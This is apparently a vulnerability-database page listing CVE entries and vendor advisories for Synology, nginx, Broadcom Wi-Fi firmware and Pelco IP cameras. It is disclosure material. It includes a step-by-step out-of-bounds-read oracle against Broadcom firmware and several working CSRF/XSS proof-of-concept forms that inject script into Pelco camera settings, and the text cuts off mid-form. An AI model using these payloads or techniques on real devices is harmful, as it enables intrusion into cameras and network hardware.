VARIoT IoT vulnerabilities database
| VAR-201708-1074 | CVE-2017-11149 | Synology Download Station Server-side request forgery vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
Server-side request forgery (SSRF) vulnerability in Downloader in Synology Download Station 3.8.x before 3.8.5-3475 and 3.x before 3.5-2984 allows remote authenticated users to download arbitrary local files via a crafted URI. Synology Download Station is a set of web-based download applications from Synology. The program supports protocols such as BT, FTP and HTTP to download files
| VAR-201708-1065 | CVE-2017-11160 | Windows Run on Synology Assistant Vulnerabilities related to untrusted search paths |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Multiple untrusted search path vulnerabilities in the installer in Synology Assistant before 6.1-15163 on Windows allow local attackers to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll or (4) dwmapi.dll file in the current working directory. Synology Assistant running on Windows contains an untrusted search path vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Synology Assistant on Windows is a Windows-based installation assistant from Synology; the installer is the affected component. An untrusted search path vulnerability exists in the installer of Synology Assistant versions earlier than 6.1-15163 on Windows platforms
| VAR-201708-1073 | CVE-2017-11148 | Synology Chat Server-side request forgery vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
Server-side request forgery (SSRF) vulnerability in link preview in Synology Chat before 1.1.0-0806 allows remote authenticated users to access intranet resources via unspecified vectors. Synology Chat contains a server-side request forgery vulnerability; information may be obtained. Synology Chat is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
Synology Chat versions prior to 1.1.0-0806 are vulnerable. Synology Chat is an instant chat tool developed by Synology; link preview is the affected component. A remote attacker could exploit this vulnerability to access internal network resources
| VAR-201708-1064 | CVE-2017-11159 | Windows Run on Synology Photo Station Uploader Vulnerabilities related to untrusted search paths |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Multiple untrusted search path vulnerabilities in the installer in Synology Photo Station Uploader before 1.4.2-084 on Windows allow local attackers to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll or (4) dwmapi.dll file in the current working directory. Synology Photo Station Uploader running on Windows contains an untrusted search path vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Synology Photo Station Uploader for Windows is a set of solutions from Synology for sharing pictures, videos and blogs on the Internet
| VAR-201708-1063 | CVE-2017-11158 | Synology Cloud Station Drive Vulnerabilities related to untrusted search paths |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Multiple untrusted search path vulnerabilities in the installer in Synology Cloud Station Drive before 4.2.5-4396 on Windows allow local attackers to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll or (4) dwmapi.dll file in the current working directory. Synology Cloud Station Drive contains an untrusted search path vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Synology Cloud Station Drive for Windows is a Windows-based computer synchronization tool from Synology; the installer is the affected component. (Malicious files include: (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll, or (4) dwmapi.dll)
| VAR-201708-1062 | CVE-2017-11157 | Synology Cloud Station Backup Vulnerabilities related to untrusted search paths |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Multiple untrusted search path vulnerabilities in the installer in Synology Cloud Station Backup before 4.2.5-4396 on Windows allow local attackers to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll or (4) dwmapi.dll file in the current working directory. Synology Cloud Station Backup contains an untrusted search path vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Synology Cloud Station Backup for Windows is a Windows-based application from Synology that can be used to back up computer data. (Malicious files include: (1) shfolder.dll, (2) ntmarta.dll, (3) secur32.dll, or (4) dwmapi.dll)
| VAR-201708-1061 | CVE-2017-11156 | Synology Download Station Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 6.5 CVSS V3: 7.8 Severity: HIGH |
Synology Download Station 3.8.x before 3.8.5-3475 and 3.x before 3.5-2984 uses weak permissions (0777) for the ui/dlm/btsearch directory, which allows remote authenticated users to execute arbitrary code by uploading an executable via unspecified vectors. Synology Download Station contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Synology Download Station is a set of web-based download applications from Synology. The program supports protocols such as BT, FTP and HTTP to download files. There is a security vulnerability in Synology Download Station 3.8.x versions before 3.8.5-3475 and 3.x versions before 3.5-2984. The vulnerability is caused by the program assigning weak permissions (0777) to the ui/dlm/btsearch directory
| VAR-201707-1309 | CVE-2017-7529 | Nginx of range filter Module integer overflow vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to an integer overflow vulnerability in the nginx range filter module, resulting in a leak of potentially sensitive information triggered by a specially crafted request. nginx is prone to a remote integer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to obtain sensitive information or may crash the application, resulting in a denial-of-service condition.
nginx 0.5.6 through 1.13.2 are vulnerable. Nginx is a lightweight web server/reverse proxy server and email (IMAP/POP3) proxy server developed by Russian programmer Igor Sysoev. The range filter module is the affected component.
For the oldstable distribution (jessie), this problem has been fixed
in version 1.6.2-5+deb8u5.
For the stable distribution (stretch), this problem has been fixed in
version 1.10.3-1+deb9u1.
For the unstable distribution (sid), this problem will be fixed soon.
We recommend that you upgrade your nginx packages.
==========================================================================
Ubuntu Security Notice USN-3352-1
July 13, 2017
nginx vulnerability
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 17.04
- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
Summary:
nginx could be made to expose sensitive information over the network. A remote attacker could use this to expose
sensitive information.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 17.04:
nginx-common 1.10.3-1ubuntu3.1
nginx-core 1.10.3-1ubuntu3.1
nginx-extras 1.10.3-1ubuntu3.1
nginx-full 1.10.3-1ubuntu3.1
nginx-light 1.10.3-1ubuntu3.1
Ubuntu 16.10:
nginx-common 1.10.1-0ubuntu1.3
nginx-core 1.10.1-0ubuntu1.3
nginx-extras 1.10.1-0ubuntu1.3
nginx-full 1.10.1-0ubuntu1.3
nginx-light 1.10.1-0ubuntu1.3
Ubuntu 16.04 LTS:
nginx-common 1.10.3-0ubuntu0.16.04.2
nginx-core 1.10.3-0ubuntu0.16.04.2
nginx-extras 1.10.3-0ubuntu0.16.04.2
nginx-full 1.10.3-0ubuntu0.16.04.2
nginx-light 1.10.3-0ubuntu0.16.04.2
Ubuntu 14.04 LTS:
nginx-common 1.4.6-1ubuntu3.8
nginx-core 1.4.6-1ubuntu3.8
nginx-extras 1.4.6-1ubuntu3.8
nginx-full 1.4.6-1ubuntu3.8
nginx-light 1.4.6-1ubuntu3.8
In general, a standard system update will make all the necessary changes.
=====================================================================
Red Hat Security Advisory
Synopsis: Low: rh-nginx110-nginx security update
Advisory ID: RHSA-2017:2538-01
Product: Red Hat Software Collections
Advisory URL: https://access.redhat.com/errata/RHSA-2017:2538
Issue date: 2017-08-28
CVE Names: CVE-2017-7529
=====================================================================
1. Summary:
An update for rh-nginx110-nginx is now available for Red Hat Software
Collections.
Red Hat Product Security has rated this update as having a security impact
of Low. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
Nginx is a web server and a reverse proxy server for HTTP, SMTP, POP3 and
IMAP protocols, with a strong focus on high concurrency, performance and
low memory usage. A remote attacker could possibly
exploit this flaw to disclose parts of the cache file header, or, if used
in combination with third party modules, disclose potentially sensitive
memory by sending specially crafted HTTP requests. (CVE-2017-7529)
Red Hat would like to thank the Nginx project for reporting this issue.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
rh-nginx110-nginx-1.10.2-8.el6.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7):
Source:
rh-nginx110-nginx-1.10.2-8.el6.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
rh-nginx110-nginx-1.10.2-8.el6.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el6.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
rh-nginx110-nginx-1.10.2-8.el7.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3):
Source:
rh-nginx110-nginx-1.10.2-8.el7.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
rh-nginx110-nginx-1.10.2-8.el7.src.rpm
x86_64:
rh-nginx110-nginx-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-debuginfo-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-image-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-perl-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-http-xslt-filter-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-mail-1.10.2-8.el7.x86_64.rpm
rh-nginx110-nginx-mod-stream-1.10.2-8.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2017-7529
https://access.redhat.com/security/updates/classification/#low
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc.
APPLE-SA-2021-09-20-4 Xcode 13
Xcode 13 addresses the following issues.
IDE Xcode Server
Available for: macOS Big Sur 11.3 and later
Impact: Multiple issues in nginx
Description: Multiple issues were addressed by updating nginx to
version 1.21.0.
CVE-2016-0742
CVE-2016-0746
CVE-2016-0747
CVE-2017-7529
CVE-2018-16843
CVE-2018-16844
CVE-2018-16845
CVE-2019-20372
Installation note:
Xcode 13 may be obtained from:
https://developer.apple.com/xcode/downloads/
To check that Xcode has been updated:
* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "Xcode 13"
| VAR-201710-1086 | CVE-2017-11122 | Broadcom BCM4355C0 of Wi-Fi Vulnerability that triggers information disclosure on chip |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
On Broadcom BCM4355C0 Wi-Fi chips 9.44.78.27.0.1.56, an attacker can trigger an information leak due to insufficient length validation, related to ICMPv6 router advertisement offloading. The Broadcom BCM4355C0 is a Wi-Fi chip from Broadcom; Wi-Fi firmware is the firmware that runs on it. There is a security vulnerability in version 9.44.78.27.0.1.56 of the Broadcom BCM4355C0 Wi-Fi chip firmware, caused by insufficient validation of a length field by the program. An attacker could exploit this vulnerability to obtain information. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS.
In order to reduce overhead on the host, some Broadcom Wi-Fi chips support offloading of certain ICMPv6 packets, including Router Advertisements, Neighbor Advertisements and Neighbor Solicitations.
On the BCM4355C0 SoC with firmware version 9.44.78.27.0.1.56, the ICMPv6 offloading is performed by ROM function 0x39AF8. This function first inspects the ethertype and ensures that it is an IPv6 packet. Then, it reads the protocol number in the "Next Header" field to verify that this is indeed an ICMPv6 packet (IPv6_ICMP). Lastly, the function reads the ICMPv6 "Type" field, and dispatches the packet to the appropriate handler.
In the case of "Router Advertisement" packets (type 134), ROM function 0x399A0 is called to handle the packet. The function has the following approximate high-level logic:
int function_0x399A0(void* ctx, char* ipv6_header, ...) {
    ...
    //Reading some IPv6 fields
    //NOTE: payload_length comes straight from the packet and is never
    //compared with the number of bytes actually received
    uint16_t payload_length = ntohs(*((uint16_t*)(ipv6_header + 4)));
    uint16_t router_lifetime = ntohs(*((uint16_t*)(ipv6_header + 46)));
    //Searching for a matching RA
    struct ra_context_t* ra_array = (struct ra_context_t*)(*((uint32_t*)ctx + 151));
    for (int i = 0; i < 10; i++) {
        struct ra_context_t* ra = &(ra_array[i]);
        if (memcmp(ra->src_addr, ipv6_header + 8, 0x10))
            continue;
        if (ra->payload_length != payload_length)
            continue;
        //Compares payload_length bytes using the unchecked length
        if (memcmp(ra->ra_data, ipv6_header + 40, payload_length))
            continue;
        if (1000 * router_lifetime <= 180000)
            continue;
        if (firmware_timestamp() >= ra->timestamp + 60000)
            continue;
        //Found a match!
        return 2; //Indicates that the packet is filtered and not passed
                  //on to the OS
    }
    //Find the entry to overwrite (round-robin index stored after the array)
    uint8_t* insertion_idx_ptr = (uint8_t*)ra_array + 322;
    if (*insertion_idx_ptr > 9)
        *insertion_idx_ptr = 0;
    struct ra_context_t* ra = &(ra_array[*insertion_idx_ptr]);
    //Populate the entry
    ra->payload_length = payload_length;
    ra->timestamp = firmware_timestamp();
    memcpy(ra->src_addr, ipv6_header + 8, 0x10);
    //Allocates and copies payload_length bytes: reads past the packet
    //when the field is larger than the real packet
    char* new_ra_data = malloc(payload_length);
    memcpy(new_ra_data, ipv6_header + 40, payload_length);
    if (ra->ra_data)
        free(ra->ra_data);
    ra->ra_data = new_ra_data;
    (*insertion_idx_ptr)++;
    return 0; //Pass the packet on to the OS
}
Where "ra_context_t" has the following structure:
struct ra_context_t {
    char* ra_data;
    uint32_t payload_length;
    uint32_t unused;
    char src_addr[0x10];
    uint32_t timestamp;
};
As we can see above, the function fails to validate that the IPv6 "Payload Length" field does not exceed the length of the packet. As a result, if the incoming RA fails to match any of the 10 cached RAs, a new entry will be saved, triggering a copy of the packet's content into a newly allocated buffer, using the attacker-controlled "payload length" field (thereby triggering an OOB read).
An attacker can use this as an oracle to leak data from the firmware. First, the attacker can send an RA with a payload length field that exceeds the real packet length by a single byte. Then, the attacker may send additional RAs in which the payload length field does indeed match the length of the packet's payload, and is also the same value as the one sent previously. By doing so, the attacker can modify the last byte of the sent RA, iterating over at most 10 different values. If the attacker guesses the last byte (which was read OOB) correctly, the packet will be filtered. Otherwise, the packet will be forwarded to the host.
In order to distinguish between these two cases, an attacker can craft the ICMPv6 packet so that a "regular" host will send back an ICMPv6 error message. For example, by setting the TTL field to zero, the host would generate an ICMPv6 "Time Exceeded" error message.
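The check the handler above is missing, as an added example (not Broadcom firmware code, and not part of the original report): check_ra_lengths, cache_ra and build_ra_frame are hypothetical names, and the 56-byte RA frame is constructed here so the block runs offline. It bounds the IPv6 Payload Length by the bytes actually received before that value reaches memcmp/memcpy, and stores the payload in a fixed buffer instead of a malloc() of attacker-chosen size.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IPV6_HDR_LEN        40   /* fixed IPv6 header, no extension headers */
#define IPV6_NEXT_ICMPV6    58   /* Next Header value for ICMPv6 */
#define ICMPV6_TYPE_RA      134  /* Router Advertisement */
#define ICMPV6_RA_FIXED_LEN 16   /* RFC 4861 RA header before any options */
#define RA_DATA_MAX         1500 /* hypothetical cap on a cached RA payload */

enum ra_check {
    RA_OK = 0,
    RA_ERR_SHORT_FRAME,  /* frame cannot hold an IPv6 header */
    RA_ERR_NOT_ICMPV6,   /* Next Header is not 58 */
    RA_ERR_BAD_LENGTH,   /* Payload Length disagrees with the bytes received */
    RA_ERR_NOT_RA        /* ICMPv6 Type is not 134 */
};

/* Hypothetical cache entry: fixed buffer, unlike the malloc() in ra_context_t above. */
struct ra_entry {
    uint8_t  src_addr[16];
    uint16_t payload_len;
    uint8_t  data[RA_DATA_MAX];
};

static uint16_t read_be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* The missing check: bound the attacker-controlled Payload Length by the bytes
 * the frame really contains before it is used as a memcmp/memcpy length.
 * Under-claims are refused too: router_lifetime lives at offset 46, inside the
 * 16-byte RA fixed header, so a shorter payload cannot be a complete RA. */
enum ra_check check_ra_lengths(const uint8_t *frame, size_t frame_len,
                               uint16_t *payload_len_out)
{
    if (frame_len < IPV6_HDR_LEN)
        return RA_ERR_SHORT_FRAME;
    if (frame[6] != IPV6_NEXT_ICMPV6)
        return RA_ERR_NOT_ICMPV6;
    uint16_t payload_len = read_be16(frame + 4);
    if (payload_len < ICMPV6_RA_FIXED_LEN ||
        (size_t)IPV6_HDR_LEN + payload_len > frame_len)
        return RA_ERR_BAD_LENGTH;
    if (frame[IPV6_HDR_LEN] != ICMPV6_TYPE_RA)
        return RA_ERR_NOT_RA;
    if (payload_len_out)
        *payload_len_out = payload_len;
    return RA_OK;
}

/* Hardened analogue of the cache insert: nothing is copied until the length
 * field has been validated against the received frame. */
enum ra_check cache_ra(struct ra_entry *e, const uint8_t *frame, size_t frame_len)
{
    uint16_t plen;
    enum ra_check rc = check_ra_lengths(frame, frame_len, &plen);
    if (rc != RA_OK)
        return rc;
    if (plen > RA_DATA_MAX)
        return RA_ERR_BAD_LENGTH;
    memcpy(e->src_addr, frame + 8, 16);
    e->payload_len = plen;
    memcpy(e->data, frame + IPV6_HDR_LEN, plen);
    return RA_OK;
}

/* Constructed sample: a minimal option-less RA from fe80::1 to ff02::1 (56 real
 * bytes). The Payload Length field is set to whatever the caller claims, so the
 * same bytes can carry an honest (16) or an inflated (17) value. */
size_t build_ra_frame(uint8_t *buf, size_t buf_len, uint16_t claimed_payload_len)
{
    const size_t total = IPV6_HDR_LEN + ICMPV6_RA_FIXED_LEN;
    if (buf == NULL || buf_len < total)
        return 0;
    memset(buf, 0, total);
    buf[0] = 0x60;                                  /* version 6 */
    buf[4] = (uint8_t)(claimed_payload_len >> 8);
    buf[5] = (uint8_t)(claimed_payload_len & 0xff);
    buf[6] = IPV6_NEXT_ICMPV6;
    buf[7] = 255;                                   /* hop limit */
    buf[8] = 0xfe; buf[9] = 0x80; buf[23] = 0x01;   /* src fe80::1 */
    buf[24] = 0xff; buf[25] = 0x02; buf[39] = 0x01; /* dst ff02::1 */
    buf[IPV6_HDR_LEN] = ICMPV6_TYPE_RA;             /* type 134, code 0 */
    buf[44] = 64;                                   /* cur hop limit */
    buf[46] = 0x07; buf[47] = 0x08;                 /* router lifetime 1800 s */
    return total;
}

/* Returns 1 when the honest frame is cached, the inflated one is refused, and a
 * non-ICMPv6 frame is turned away before any length field is trusted. */
int self_check(void)
{
    uint8_t frame[64];
    struct ra_entry e;
    size_t n = build_ra_frame(frame, sizeof frame, ICMPV6_RA_FIXED_LEN);
    if (n != 56 || cache_ra(&e, frame, n) != RA_OK || e.payload_len != 16)
        return 0;
    n = build_ra_frame(frame, sizeof frame, ICMPV6_RA_FIXED_LEN + 1);
    if (cache_ra(&e, frame, n) != RA_ERR_BAD_LENGTH)
        return 0;
    frame[6] = 6;                                   /* TCP, not ICMPv6 */
    return check_ra_lengths(frame, n, NULL) == RA_ERR_NOT_ICMPV6;
}
```

With the check in place, the one-byte over-claim that drives the oracle is rejected before the comparison loop, so the "filtered or forwarded" signal the report relies on no longer depends on memory past the packet.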
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: laginimaineb
| VAR-201905-1051 | CVE-2018-7827 | Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
A Cross-Site Scripting (XSS) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera in which a remote attacker can execute arbitrary HTML and script code in a user's browser session. Pelco Sarix/Spectra Cameras are cameras from Pelco. The Schneider Electric 1st Gen Pelco Sarix Enhanced Camera and Schneider Electric Spectra Enhanced PTZ Camera are products of Schneider Electric. The Schneider Electric 1st Gen Pelco Sarix Enhanced Camera is a series of fixed IP cameras. The Schneider Electric Spectra Enhanced PTZ Camera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. The POST parameter 'enable_leds' located in the update() function called via the GeneralSetupController.php script is not properly sanitised before being used in the writeLedConfig() function to set the LED state to on or off. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges, using a specially crafted request and escape sequence to the system shell.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. Sarix™ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
